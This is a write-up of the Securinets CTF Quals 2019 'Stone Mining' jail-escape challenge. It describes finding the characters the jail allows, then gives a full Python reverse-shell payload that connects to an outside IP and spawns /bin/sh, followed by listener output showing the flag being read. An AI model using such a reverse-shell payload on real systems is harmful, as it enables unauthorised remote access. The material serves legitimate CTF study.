Securinets CTF Quals 2019 - Stone Mining WriteUp
Challenge details
| Event | Challenge | Category | Points | Solves |
|---|---|---|---|---|
| Securinets CTF Quals 2019 | Stone Mining | PWN | 1000 | 4 |
Description
I went inside a mine thinking it was safe, but got stuck. Help me out.
Service is running at: nc 52.17.200.40 4000
Author: bibiwars
A jail escape challenge this time, with no prompt, probably a shell jail.
Jail - Stone Mining
Objective is to read 'flag' file from the current directory
___________________________________________________________
We can start by executing some random commands:
shell: id, echo foobar, whoami …
python: print(“foobar”), dir() …
…
id
Not today, some blacklisted caracter has been used
echo foobar
Not today, some blacklisted caracter has been used
print("foboar")
Not today, some blacklisted caracter has been used
dir()
Not today, some blacklisted caracter has been used
We got only one message, “Not today, some blacklisted caracter has been used”, which means that some chars are blacklisted.
a
Not today, some blacklisted caracter has been used
b
Command executed :D
c
Not today, some blacklisted caracter has been used
d
Command executed :D
e
Command executed :D
f
Not today, some blacklisted caracter has been used
0
Not today, some blacklisted caracter has been used
1
Not today, some blacklisted caracter has been used
2
Not today, some blacklisted caracter has been used
3
Not today, some blacklisted caracter has been used
As we can see, at least some chars are allowed.
After some testing I found that these ASCII lowercase chars are allowed:
ertyuopdghbn
There are other allowed chars, but I used only these chars to escape the jail.
So how can we bypass that?
I first noticed that we can use the word “python”, since all its chars are allowed.
I made an attempt to print to stdout, but didn’t get any output.
$ nc 52.17.200.40 4000
Jail - Stone Mining
Objective is to read 'flag' file from the current directory
___________________________________________________________
python
print('foobar')
exit()
^C
So I assumed that stdout and stderr are closed or filtered. Therefore, I attempted to connect to the outside using Python sockets.
I started a listener on my host and connected to it.
Remote Host:
$ nc 52.17.200.40 4000
Jail - Stone Mining
Objective is to read 'flag' file from the current directory
___________________________________________________________
python
import socket
s = socket.socket()
s.connect(('41.102.162.29', 2130))
s.send(b'test\n')
^C
My host:
nc -vvntlp 2130
Listening on any address 2130 (xds)
Connection from 41.102.162.29:39198
test
Total received bytes: 5
Total sent bytes: 0
So it works fine after closing the connection (CTRL+C to close netcat).
Putting the Pieces Together
The goal is getting a reverse shell.
First, run the Python interpreter.
python
Then copy/paste the payload there. The script won’t execute until the connection is closed; since we are using netcat, we need to send the interrupt signal CTRL+C to close the connection.
import subprocess
cmd = ["python","-c",'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("41.102.162.29",2130)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);']
subprocess.Popen(cmd)
I used “subprocess.Popen” to run “python -c” and spawn a new background process, in order to avoid killing the process after closing the connection. We won’t see any output in this jail, but you will get a reverse shell.
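The two process-level facts this relies on, shown as an added example that is not part of the original writeup: a non-interactive python reads its whole program from stdin before running any of it (so nothing happens until the connection closes), and a child started with subprocess.Popen keeps running after its parent exits. The parent script below is a constructed stand-in for the jailed process; it models the parent simply exiting, so a jail that signals the whole process group on disconnect would behave differently.

```python
import os
import select
import signal
import subprocess
import sys

def runs_only_after_eof(script="print('ran')\n", wait=0.5):
    """Feed a script to a non-interactive python over a pipe.
    Returns (output_seen_before_eof, output_after_eof): nothing appears
    until stdin is closed, because python reads the whole program first."""
    p = subprocess.Popen([sys.executable, "-"], stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE, stderr=subprocess.DEVNULL,
                         text=True)
    p.stdin.write(script)
    p.stdin.flush()
    ready, _, _ = select.select([p.stdout], [], [], wait)  # anything yet?
    early = bool(ready)
    p.stdin.close()  # EOF, like CTRL+C closing the netcat session
    out = p.stdout.read()
    p.wait()
    return early, out

# Constructed stand-in for the jailed process: it Popen()s a child that
# shares none of its pipes, prints the child's pid and exits at once.
PARENT_CODE = r"""
import subprocess, sys
child = subprocess.Popen([sys.executable, "-c", "import time; time.sleep(60)"],
                         stdin=subprocess.DEVNULL, stdout=subprocess.DEVNULL,
                         stderr=subprocess.DEVNULL)
print(child.pid, flush=True)
"""

def child_outlives_parent():
    """Run PARENT_CODE to completion, then report whether its child is
    still alive (signal 0 only checks existence) and clean it up."""
    parent = subprocess.run([sys.executable, "-c", PARENT_CODE],
                            capture_output=True, text=True, check=True)
    child_pid = int(parent.stdout.strip())
    try:
        os.kill(child_pid, 0)
        alive = True
    except ProcessLookupError:
        alive = False
    if alive:
        os.kill(child_pid, signal.SIGKILL)
    return alive
```

`runs_only_after_eof()` returns `(False, 'ran\n')` and `child_outlives_parent()` returns `True` on a POSIX host.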
$ nc -vvntlp 2130
Listening on any address 2130 (xds)
Connection from 41.102.162.29:39190
$ id
uid=999(ctf) gid=999(ctf) groups=999(ctf)
$ ls -la
total 12
drwxr-xr-x 1 root ctf 4096 Mar 24 02:10 .
drwxr-xr-x 1 root ctf 4096 Mar 24 02:10 ..
-rwxr-x--- 1 root ctf 59 Mar 23 04:17 flag
$ cat flag
c2VjdXJpbmV0c3szODExMjc5Zjg4M2JkM2Q3ZWFkZjU3NmNlY2Y4ZDVjYn0$
$ cat flag | base64 -d
securinets{3811279f883bd3d7eadf576cecf8d5cb}
$
Jails can be escaped in various ways.
I’m not sure if the solution I came to is the intended one.
FLAG: securinets{3811279f883bd3d7eadf576cecf8d5cb}